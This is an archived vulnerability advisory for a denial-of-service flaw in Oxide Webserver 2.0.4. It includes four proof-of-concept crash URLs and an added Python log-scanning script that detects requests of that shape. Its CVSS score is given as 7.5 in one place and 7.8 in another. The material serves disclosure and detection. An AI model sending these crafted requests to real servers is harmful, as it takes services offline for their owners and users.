Vendor: Oxide Webserver
By: Antu Sanadi
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: N/A
Product Name: Oxide Webserver
Affected Version From: Oxide Webserver version 2.0.4 and prior.
Affected Version To: Oxide Webserver version 2.0.4 and prior.
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2012

Oxide Webserver Remote Denial of Service Vulnerability

Oxide Webserver v2.0.4 is prone to a remote Denial of Service vulnerability as it fails to handle crafted requests from the client properly.

Mitigation:

Not available

Exploit-DB raw data:

##############################################################################
#
# Title    : Oxide Webserver Remote Denial of Service Vulnerability
# Author   : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor   : http://sourceforge.net/projects/oxide/
# Advisory : http://secpod.org/blog/?p=516
#	   : http://secpod.org/advisories/SecPod_Oxide_WebServer_DoS_Vuln.txt
# Software : Oxide Webserver v2.0.4 and prior.
# Date     : 29/06/2012
#
###############################################################################

SecPod ID: 1043                                    24/01/2012 Issue Discovered
                                                   19/06/2012 Vendor Notified
                                                   No Response from vendor
                                                   18/07/2012 Advisory Released


Class: Denial of Service                           Severity: High


Overview:
---------
Oxide Webserver v2.0.4 is prone to a remote Denial of Service vulnerability
as it fails to handle crafted requests from the client properly.


Technical Description:
----------------------
The vulnerability is caused by an error in handling some crafted characters
in HTTP GET requests, which causes the server to crash.


Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.


Affected Software:
------------------
Oxide Webserver version 2.0.4 and prior.


Tested on,
Oxide Webserver version 2.0.4 on Windows XP SP3


References:
-----------
http://secpod.org/blog/?p=516
http://sourceforge.net/projects/oxide
http://sourceforge.net/projects/oxide-ws/files
http://secpod.org/advisories/SecPod_Oxide_WebServer_DoS_Vuln.txt


Proof of Concept:
----------------
http://www.example.com:80/?.
http://www.example.com:80/<.
http://www.example.com:80/$.
http://www.example.com:80/cc.


Solution:
----------
Not available
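
With no fix available, access logs can show whether a server has received requests shaped like the proof-of-concept URLs above. The following is an added example, not part of the SecPod advisory or of Oxide Webserver; it assumes logs in Common Log Format (for instance from a front-end proxy) and assumes the trailing dot shared by the four PoC URLs is the common element, which the advisory does not state. The names `suspicious_target`, `find_probes` and `SAMPLE_LOG` are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: client ident user [time] "METHOD target HTTP/x.y" status size
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}|-) '
)

def suspicious_target(target):
    """True if the request target has the shape of the PoC URLs: it ends in a dot.
    Assumption: the trailing dot is the common element; the advisory does not say so."""
    path = re.sub(r'^[a-z]+://[^/]*', '', target, flags=re.I)  # absolute-form -> path
    path = unquote(path)                                        # %2e counts as a dot
    return path.startswith('/') and path.endswith('.')

def find_probes(lines):
    """Map each client address to the GET targets it sent that match the PoC shape."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        # The advisory describes GET requests only, so other methods are ignored.
        if m and m['method'] == 'GET' and suspicious_target(m['target']):
            hits[m['client']].append(m['target'])
    return dict(hits)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.77 - - [18/Jul/2012:10:00:05 +0000] "GET /?. HTTP/1.1" - 0',
    '192.0.2.77 - - [18/Jul/2012:10:00:09 +0000] "GET /cc%2E HTTP/1.0" - 0',
    '192.0.2.10 - - [18/Jul/2012:10:00:12 +0000] "GET /docs/v2.0/ HTTP/1.1" 200 1024',
    '192.0.2.10 - - [18/Jul/2012:10:00:15 +0000] "POST /form. HTTP/1.1" 200 10',
    '198.51.100.4 - - [18/Jul/2012:10:00:20 +0000] "GET /$. HTTP/1.1" 200 0',
]

if __name__ == '__main__':
    for client, targets in find_probes(SAMPLE_LOG).items():
        print(client, targets)
```

A match only indicates a request of this shape was received; correlate it with server restarts or gaps in the log before treating it as a crash attempt.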


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = COMPLETE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.